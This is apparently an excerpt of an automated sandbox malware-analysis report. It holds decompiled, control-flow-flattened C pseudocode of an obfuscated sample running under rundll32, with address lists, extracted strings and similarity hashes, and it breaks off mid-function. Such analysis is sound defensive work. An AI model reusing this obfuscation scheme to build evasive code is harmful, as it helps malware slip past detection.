				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x25ca2c; // 0x2c8300
							 *((intOrPtr*)(_t202 + 0x218)) = E00257CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00248736(0x454);
							 *0x25ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E002520C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E0024B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E0024C6C7(_v536, _v572,  *0x25ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00253E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E0024E29C(_v576, _v592,  &_v520);
						_t216 =  *0x25ca2c; // 0x2c8300
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E00245FB2(_v540, _v556, _t244);
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00242959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x25ca2c; // 0x2c8300
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}

0x00254b41
0x00254b47
0x00254b50
0x00254b54
0x00254b59
0x00254b5d
0x00254b64
0x00254b75
0x00254b79
0x00254b7b
0x00254b83
0x00254b91
0x00254b96
0x00254ba1
0x00254ba4
0x00254ba8
0x00254bad
0x00254bb5
0x00254bbd
0x00254bc2
0x00254bca
0x00254bd2
0x00254bda
0x00254be2
0x00254bea
0x00254bef
0x00254bf4
0x00254bfc
0x00254c04
0x00254c0c
0x00254c14
0x00254c1c
0x00254c2c
0x00254c30
0x00254c35
0x00254c3d
0x00254c45
0x00254c4d
0x00254c55
0x00254c5d
0x00254c6a
0x00254c6d
0x00254c71
0x00254c79
0x00254c81
0x00254c89
0x00254c91
0x00254c99
0x00254ca6
0x00254cb2
0x00254cb6
0x00254cbb
0x00254cc3
0x00254ccf
0x00254cd2
0x00254cd6
0x00254cde
0x00254ce6
0x00254cf7
0x00254d02
0x00254d06
0x00254d0e
0x00254d16
0x00254d1e
0x00254d26
0x00254d2e
0x00254d36
0x00254d3e
0x00254d46
0x00254d4e
0x00254d56
0x00254d5e
0x00254d66
0x00254d6e
0x00254d76
0x00254d7e
0x00254d8b
0x00254d8f
0x00254d97
0x00254d9f
0x00254da7
0x00254db2
0x00254db6
0x00254dba
0x00254dc2
0x00254dc2
0x00254dca
0x00254dca
0x00254dca
0x00254dca
0x00254dcc
0x00000000
0x00000000
0x00254dd2
0x00254e98
0x00254ea0
0x00254ea5
0x00254ea5
0x00254ea5
0x00254ead
0x00254eb2
0x00254ebc
0x00254ebc
0x00000000
0x00254ebc
0x00254dde
0x00254e69
0x00254e6a
0x00254e70
0x00254e75
0x00254e7c
0x00254e7e
0x00000000
0x00000000
0x00254e84
0x00254e8e
0x00000000
0x00254e8e
0x00254de6
0x00254e4e
0x00254e53
0x00000000
0x00254e53
0x00254dee
0x00254e2c
0x00254e34
0x00254e39
0x00254e41
0x00000000
0x00254e41
0x00254df2
0x00000000
0x00000000
0x00254df8
0x00254df9
0x00254e15
0x00254e1a
0x00254e1d
0x00254e26
0x00254e27
0x00254e27
0x00254ec3
0x00254ec9
0x00254f39
0x00254f4b
0x00254f50
0x00254f56
0x00254f59
0x00254f5f
0x00000000
0x00254f5f
0x00254ecb
0x00254ed1
0x00254f25
0x00000000
0x00254f2a
0x00254ed3
0x00254ed9
0x00000000
0x00000000
0x00254eef
0x00254ef4
0x00254ef6
0x00254ef9
0x00254efb
0x00254f15
0x00254efd
0x00254efd
0x00254f05
0x00254f0b
0x00254f0b
0x00000000
0x00254f64
0x00254f64
0x00254f64
0x00254f71
0x00254f7c

Strings

j, xrefs: 00254F64
X, xrefs: 00254D6E
, xrefs: 00254CBB
8b, xrefs: 00254BF4
`=6, xrefs: 00254E34
!yG, xrefs: 00254C79
`=6, xrefs: 00254ECB
x0, xrefs: 00254D9F
,, xrefs: 00254E2C
j, xrefs: 00254F5F
Q, xrefs: 00254BB5
o9, xrefs: 00254D7E

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
API String ID: 0-3958274775
Opcode ID: 73acc367e87a424f838ee28749b258c675f1c99f70d9738166c4467e0f9e8165
Instruction ID: 9c3b14688c7355e7ad7e77fd19442113bc79baf6b839d2217bf02e8e668f04f6
Opcode Fuzzy Hash: 73acc367e87a424f838ee28749b258c675f1c99f70d9738166c4467e0f9e8165
Instruction Fuzzy Hash: EBA155711183819FD358DF64C48A42BFBE1FBC4358F204A1DF596962A0D7B8CA99CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00253895, Relevance: 14.0, Strings: 11, Instructions: 274
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00253895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E0025AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E0024B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00254F7D(_v632, _v628, _t324); // executed
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E0024F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E0025889D(0x25c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x25ca2c; // 0x2c8300
												_t224 = _t321 + 0x230; // 0x77004d
												E0024C680(_t224, _v648, _v608, _t303, _v636,  *0x25ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00252025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E0024B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}

0x00253895
0x0025389b
0x002538a5
0x002538ad
0x002538b2
0x002538bd
0x002538c5
0x002538ca
0x002538d2
0x002538d7
0x002538df
0x002538e7
0x002538ef
0x002538f7
0x002538ff
0x00253907
0x0025390f
0x0025391e
0x00253922
0x00253924
0x00253933
0x00253934
0x00253938
0x00253940
0x00253948
0x00253950
0x00253958
0x0025395d
0x00253965
0x0025396d
0x00253975
0x0025397d
0x00253985
0x0025398d
0x00253995
0x0025399a
0x002539a2
0x002539b0
0x002539b4
0x002539bc
0x002539c4
0x002539d1
0x002539d5
0x002539da
0x002539e2
0x002539ef
0x002539f3
0x002539f7
0x002539ff
0x00253a07
0x00253a0f
0x00253a17
0x00253a1f
0x00253a27
0x00253a2f
0x00253a37
0x00253a3f
0x00253a44
0x00253a49
0x00253a51
0x00253a59
0x00253a5e
0x00253a66
0x00253a6e
0x00253a76
0x00253a7e
0x00253a86
0x00253a8e
0x00253a96
0x00253a9e
0x00253aac
0x00253ab4
0x00253ab8
0x00253ac0
0x00253ac8
0x00253ad0
0x00253ad8
0x00253ae0
0x00253ae8
0x00253af0
0x00253af8
0x00253b00
0x00253b08
0x00253b18
0x00253b21
0x00253b24
0x00253b28
0x00253b30
0x00253b38
0x00253b45
0x00253b4e
0x00253b52
0x00253b5a
0x00253b6a
0x00253b6e
0x00253b76
0x00253b7e
0x00253b83
0x00253b8b
0x00253b90
0x00253b98
0x00253ba0
0x00253ba5
0x00253bad
0x00253bb5
0x00253bba
0x00253bc2
0x00253bca
0x00253bd2
0x00253bd7
0x00253bdc
0x00253be4
0x00253bec
0x00253bf1
0x00253bf9
0x00253c01
0x00253c0d
0x00253c10
0x00253c14
0x00253c1c
0x00253c20
0x00253c28
0x00253c30
0x00253c38
0x00253c38
0x00253c4a
0x00253db7
0x00000000
0x00253c50
0x00253c52
0x00253da5
0x00253daa
0x00253dad
0x00000000
0x00253c58
0x00253c5e
0x00253d0c
0x00253d17
0x00253d1e
0x00253d26
0x00253d2d
0x00253d34
0x00253d3b
0x00253d57
0x00253d5e
0x00253d65
0x00253d6c
0x00253d73
0x00253d7a
0x00253d7e
0x00253d80
0x00253d83
0x00000000
0x00253c64
0x00253c6a
0x00253e2c
0x00253c70
0x00253c76
0x00253cf4
0x00253cfb
0x00253d00
0x00000000
0x00253c78
0x00253c78
0x00253c7e
0x00000000
0x00253c84
0x00253c84
0x00253c91
0x00253c96
0x00253cb8
0x00253cc2
0x00253cc8
0x00253ccd
0x00253cde
0x00253ce5
0x00000000
0x00253ce5
0x00253c7e
0x00253c76
0x00253c6a
0x00253c5e
0x00253c52
0x00253e35
0x00253e3e
0x00253e3e
0x00253df7
0x00253dfc
0x00253dfe
0x00253e01
0x00253e04
0x00253e10
0x00000000
0x00253e06
0x00253e06
0x00000000
0x00253e06
0x00000000
0x00253e15
0x00253e15
0x00253e15
0x00000000

Strings

tion could not be completed because the channel has been aborted., xrefs: 00253C38, 00253CE5
d&, xrefs: 00253950
6j, xrefs: 002538CA
/w, xrefs: 002538DF
:{M/, xrefs: 00253DAD
-(, xrefs: 002539DA
WU, xrefs: 00253B6E
$, xrefs: 002539FF
y#, xrefs: 00253BBA
:{M/, xrefs: 00253C70
jy, xrefs: 00253965

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$tion could not be completed because the channel has been aborted.$y#$$
API String ID: 2962429428-2052287752
Opcode ID: 29599565c77ffe057a297c8d997673b2b9c490083eca3b0e195cb5bba675dd5c
Instruction ID: 2123fd9617d362079330b58fc954f1050a2e0ba1fc18f22060c8f3fdcf3942ee
Opcode Fuzzy Hash: 29599565c77ffe057a297c8d997673b2b9c490083eca3b0e195cb5bba675dd5c
Instruction Fuzzy Hash: E4D12F715183818FE368CF21C489A5BBBF1BBC4358F108A1DF5DA862A0D7B98958CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002542DA, Relevance: 7.9, Strings: 6, Instructions: 373
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E002542DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E0025A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00258C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E002594DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00245FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E0024F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E0024F536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
